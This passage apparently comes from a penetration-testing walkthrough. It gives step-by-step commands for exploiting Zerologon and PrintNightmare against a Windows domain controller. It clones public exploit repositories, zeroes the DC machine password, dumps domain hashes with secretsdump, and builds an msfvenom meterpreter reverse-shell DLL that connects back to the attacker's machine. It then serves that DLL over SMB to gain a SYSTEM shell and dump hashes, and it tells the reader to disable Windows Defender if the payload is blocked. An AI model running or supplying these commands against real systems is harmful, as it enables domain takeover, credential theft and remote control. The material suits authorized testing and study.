- Make sure to restore if you use this attack, otherwise the domain controller will be broken. You can also use the tester and tell the client in your report (to avoid breaking anything).
- Clone https://github.com/dirkjanm/CVE-2020-1472
- https://github.com/SecuraBV/CVE-2020-1472 to copy the tester file
zerologon_tester.py - All we need for the zero logon tester is the name of the Domain Controller (HYDRA-DC) and the IP address:
python3 zerologon_tester.py <DOMAIN CONTROLLER> <DC-IP> - Next, to run the exploit all we need to do is use:
python3 cve-2020-1472-exploit.py <DOMAIN CONTROLLER> <DC-IP> - To check, use secretsdump:
secretsdump.py -just-dc <DOMAIN>/<DOMAIN CONTROLLER>\$@<DC-IP> - Now to restore, first copy the administrator hash and
secretsdump.py administrator@<DC-IP> -hash <hash>. Copy the entireplain_password_hex. - Back in the exploit folder run
python3 restorepassword.py <DOMAIN>/<DOMAIN CONTROLLER>@<DOMAIN CONTROLLER> -target-ip <DC-IP> -hexpass <password hex>
PrintNightmare is a critical security flaw found in the Windows Print Spooler service, which manages print jobs sent to printers. It allows an attacker to execute remote code with system-level privileges on affected machines.
For this, we are going to use the resources found here https://github.com/cube0x0/CVE-2021-1675.
To check if our DC is vulnerable to this attack:
rpcdump.py @<DC-IP> | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol
If we see the above after hitting ENTER, then the DC is vulnerable.
Before running the exploit, we need to install the latest version of impacket:
pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py installOnce that’s done.
Let’s grab the actual exploit https://github.com/cube0x0/CVE-2021-1675/blob/main/CVE-2021-1675.py. We can copy the actual code, open a text document, paste the code and save it as a python file (Don’t forget to add the .py extension).
Next to generate a malicious dll payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<KALI-IP> LPORT=5555 -f dll > shell.dll.
Since, we’re using msfvenom for the payload….
We’ll start up msfconsole and use exploit/multi/handler for the meterpreter session:
set payload windows/x64/meterpreter/reverse_tcpset LPORT 5555set LHOST <KALI-IP>run
Now open up a new terminal window, to set up a smbserver using impacket to host the shell.dll payload:
smbserver.py share 'pwd'(Make sure to run this in the same directory as the payload).
Everything is set up. Time to run the exploit.
python3 CVE-2021-1675.py <DOMAIN>/<user>:<pass>@<DC-IP>@<DC-IP> '\\<KALI-IP>\share\shell.dll'
NOTE: If there’s an error, try running smbserver.py with the -smb2support tag. AND if upon running we get a ERROR_VIRUS_INFECTED notification, login into the Domain Controller and disable Windows Defender.
Back in msfconsole, we should a meterpreter shell. We can do anything now such as using the hashdump command to dump the hashes.